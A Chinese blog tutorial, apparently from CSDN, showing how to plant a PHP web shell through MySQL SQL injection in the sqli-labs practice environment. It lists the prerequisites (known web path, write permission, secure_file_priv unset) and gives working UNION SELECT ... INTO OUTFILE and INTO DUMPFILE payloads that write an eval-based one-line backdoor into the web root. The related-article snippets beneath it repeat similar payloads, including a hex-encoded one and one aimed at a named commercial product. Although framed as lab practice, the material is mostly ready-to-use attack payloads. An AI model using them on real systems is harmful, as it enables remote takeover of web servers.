sql注入写入shell

已于 2022-05-09 20:52:07 修改
阅读量6.8k 收藏 13
点赞数
文章标签: web安全 安全漏洞 网络安全 信息安全
于 2022-04-23 22:09:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51646864/article/details/124370779
版权

前提条件:

1、知道web路径

2、有文件写入权限

3、能用select into outfile导出文件

sqlilab靶场测试

首先设置靶场目录可写权限:

来到C:\phpstudy\PHPTutorial\MySQL目录下,打开my.ini文件,添加一句:secure_file_priv="/"

原因:

如果secure_file_priv=NULL,MYSQL服务会禁止导入和导出操作。
如果secure_file_priv=/tmp/,MYSQL服务只能在/tmp/目录下导入和导出
如果secure_file_priv="" ,MYSQL服务导入和导出不做限制

开始写入shell:

直接进入靶场,这里就忽略判断注入点、判断字段数、判断回显位这些步骤了。

绝对路径可以通过sqlilab前面关卡获取。

直接进行文件写入,本次在 C:\phpstudy\PHPTutorial\WWW\sqli\ 路径下写入一个shell.php,内容为:<?php @eval($_POST['cmd']);?>

?id=1' union select 1,"<?php @eval($_POST['cmd']);?>",3 into outfile 'C:\\phpstudy\\PHPTutorial\\WWW\\sqli\\shell.php' --+

写入成功:

 蚁剑尝试连接成功:

dumpfile函数写入同理:

union select 1,"<?php @eval($_POST['pass']);?>",3 into dumpfile 'C:\\phpstudy\\PHPTutorial\\WWW\\sqli\\aa2.php'--+

 

遥远之空
关注
高级SQL注入shell,一般黑客不知道1
08-08
标题中的“高级SQL注入shell,一般黑客不知道1”指的是黑客利用SQL注入漏洞来获取服务器的控制权,也就是所谓的“shell”。SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL语句,欺骗Web应用程序,使其...
shell 实现mysql写入操作
afei2530的博客
07-06 443
mysql -uroot study -proot << EOF > insert into top_n_movie(movie,sumprice)values('hello kitty',100);> EOF 一定要换行 shell 实现mysql写入操作 shell语句查询mysql数据库的常用方法 转载于:https://www.cnblogs...
sql注入之getshell方式
最新发布
m0_52484587的博客
07-11 1210
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
SQL注入GetShell的方法(1)
forinput的博客
05-06 4112
SQL注入getshell的五中方式
搬砖笔记-SQL注入shell的语句
WM_NNXX的博客
08-25 2517
SQL注入shell的几种语句 需要绝对路径和权限。 union select 后写入 lines terminated by 写入 lines starting by 写入 fields terminated by 写入 COLUMNS terminated by 写入 union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 http://1.1.1.1/x/x.php?id=1 union select 1,2,3,4,’<?php p
sqlshell原理_sql注入写入shell的条件
2401_84281655的博客
05-17 992
1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要写入木马的web路径,不然蚁剑如何连接获取方式有:(1)网页报错信息 (2)phpinfo等探针信息 (3)猜测常见web目录2. 对web目录有可权限即secure_file_priv = ''配置为空原因是--os-shell参数写入shell使用的是select xx into outfile而secure_file_priv此配置。
sql注入getshell的几种方式
热门推荐
内心不种满鲜花就会长满杂草
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
渗透测试-sql注入getshell的几种方式
lza20001103的博客
08-19 991
渗透测试-sql注入getshell的几种方式 文章目录渗透测试-sql注入getshell的几种方式一. into outfile(1)看secure-file-priv参数的值 介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell。 一. into outfile 利用条件 此方法利用的先决条件 web目录具有权限,能够使用单引号 知道网站绝对路径(根目录,或则是根目录往下的目录都行) secure_file_priv没有具体值(在mysql/m
360天擎-前台sql注入1
08-03
- **添加字段并写入数据**:向表`O`中添加一个字段`T`,并通过SQL注入语句写入包含PHP代码的shell内容。示例命令如下: ``` ;create table O(T TEXT);insert into O(T) values('($_POST[1]);?>'); ``` 此步骤的...
最详细的SQL注入相关的命令整理.txt
07-18
### SQL注入相关命令详解 #### 一、概述 SQL注入是一种常见的网络安全攻击方式,通过将恶意SQL代码插入到应用程序查询中来实现对数据库的非法访问或控制。本文档旨在整理和归纳一系列与SQL注入相关的命令及其应用...
SQL注入语句
05-07
标题与描述概述的知识点主要围绕SQL注入技术,这是一种常见的安全攻击方式,攻击者通过将恶意SQL代码注入到应用程序中,从而获取对数据库的未授权访问。以下是对这些知识点的详细解释: 1. **返回数据库名**:"and ...
sql注入关键字大全
07-27
### SQL注入关键字详解 #### 一、SQL注入基础概念 SQL注入是一种常见的安全攻击手段,攻击者通过在输入数据中嵌入恶意SQL代码,利用应用程序对用户输入验证不足的漏洞,实现非法操作数据库的目的。本篇文章将围绕...
SQL注入shell权限
CP1024的博客
01-21 3501
SQL注入shell权限 需要的条件 1. root权限 2. 知道网站的物理绝对路径 3. load_file() 开启 即 secure_file_priv 无限制 可以通过select @@secure_file_priv;查询 (1):如果为NULL,则不能写入 (2):如果为空,可以在任意文件位置下写入 (3):如果为一个路径,可以在该文件路径写入 4. 有写入权限 联合写入 ?id=1 UNION ALL SELECT 1,'<?php phpinfo();?>',3 into
sqlshell原理
xyxyxyxyy的博客
09-14 834
主要阐述了sqlmap工具webshell到mysql中的原理
mysqlshell
weixin_47385895的博客
08-22 1975
mysql常见shell方法
【知识整理】利用SQL语句shell的方法
命运的旋律的博客
03-22 3601
利用SQL语句shell的方法 要利用sqlshell就需要在配置中满足以下条件: 在mysql的配置文件my.ini中,secure_file_priv为空(被注释掉或不填)或者secure_file_priv配置是目录地址。 未开启全局GPC 关于mysql的secure_file_priv属性得多说几句 当secure_file_priv为空时,mysql对导入导出文件是没有限制的 ...
sql注入shell
jingxiaoxiong459的博客
08-01 373
id=-1' union select 1,2,0x3c3f706870206576616c2840245f524551554553545b785d293b3f203e into outfile 'D:\\phpstu\\phpstudy_pro\\WWW\\shell.php' --+ 尝试将一句话木马shell.php放入网站根目录。1.先将mysql.ini配置文件添加secure_file_priv = '',让secure_file_priv 不表示任何值。3.准备一句话木马<?
SQL注入WebShell方式小结
Mi1k7ea
12-09 2万+
这里小结一下通过SQL注入写入WebShell的方法。 传统的SQL语句shell 通过SQL注入select into outfile实现,如: 1' union select 1,'&lt;?php eval($_POST[a]);?&gt;' INTO OUTFILE '/var/www/tmp/nb.php'# sqlmapshell 前提都是需要对目标目录具有权限。 -...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值